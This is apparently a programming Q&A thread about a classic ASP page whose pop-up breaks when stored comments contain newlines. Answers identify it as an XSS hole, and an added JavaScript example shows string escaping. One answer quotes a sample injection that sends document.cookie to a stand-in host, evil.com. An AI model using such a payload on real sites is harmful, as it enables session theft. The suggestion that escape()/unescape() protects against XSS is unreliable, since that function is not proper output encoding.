
Escape Sequence problem - cannot open a page

I have the following problem. I have a form where the user can enter some data. There are all kinds of users, so it happened that a user entered an escape sequence (e.g., text \n text). This entry is inserted into the database. However, the user can click a button to open a pop-up window in which the submitted comment is displayed. All windows operate smoothly, except those that contain escape sequences; they cannot be opened. This is classic ASP with JavaScript. Has anyone had a similar problem? Maybe the charset is the problem?


You've discovered the more benign problems of XSS holes.

You need to JavaScript-escape the strings.

You need to do this now, before someone enters ");document.location = "http://evil.com/?cookie=" + document.cookie;//


To go along with SLaks:

At the very least, use escape(stringVariable) and unescape(stringVariable) to encode (and later decode) most special characters to help prevent XSS (stands for Cross Site Scripting). SLaks's example shows someone injecting malicious code to redirect a user to another site while copying any existing cookie information.
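An added example, not part of the original question or answers: it reproduces the symptom from the question (a raw line break makes the generated script fail to parse, so the pop-up never opens) and shows the same value after JavaScript-escaping as the first answer advises. The names showComment, jsStringEscape, renderRaw, renderEscaped and runInPage are assumptions, since the page does not show the actual code.

```javascript
// Escape a value for use inside a quoted JavaScript string literal that is
// written into an inline <script> block. Hypothetical helper, not from the page.
function jsStringEscape(value) {
  return String(value).replace(/[\\"'<>&\u0000-\u001f\u007f\u2028\u2029]/g, function (ch) {
    if (ch === "\\") return "\\\\";
    if (ch === "\n") return "\\n";
    if (ch === "\r") return "\\r";
    // Quotes, <, >, &, remaining control characters and U+2028/U+2029 become
    // \uXXXX, so the value can neither end the literal nor close the script tag.
    return "\\u" + ("0000" + ch.charCodeAt(0).toString(16)).slice(-4);
  });
}

// The call the server writes into the page; showComment is an assumed name.
function renderRaw(comment) { return 'showComment("' + comment + '");'; }
function renderEscaped(comment) { return 'showComment("' + jsStringEscape(comment) + '");'; }

// Parse and run a generated statement as the browser would, recording what
// reached showComment and whether any extra code ran.
function runInPage(statement) {
  var seen = { shown: null, injected: false, error: null };
  try {
    new Function("showComment", "seen", statement)(function (text) { seen.shown = text; }, seen);
  } catch (e) {
    seen.error = e.name; // SyntaxError: the script is rejected, the pop-up never opens
  }
  return seen;
}

// Constructed inputs: a comment with a line break, and one that closes the
// literal early and sets a harmless flag.
var samples = ["text \n text", '"); seen.injected = true; //'];
samples.forEach(function (comment) {
  console.log(JSON.stringify(comment));
  console.log("  raw:    ", JSON.stringify(runInPage(renderRaw(comment))));
  console.log("  escaped:", JSON.stringify(runInPage(renderEscaped(comment))));
});
```

In classic ASP the equivalent replacement has to run on the server before the value is written into the response. If the call sits inside an HTML attribute such as onclick, the result also needs HTML-encoding.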
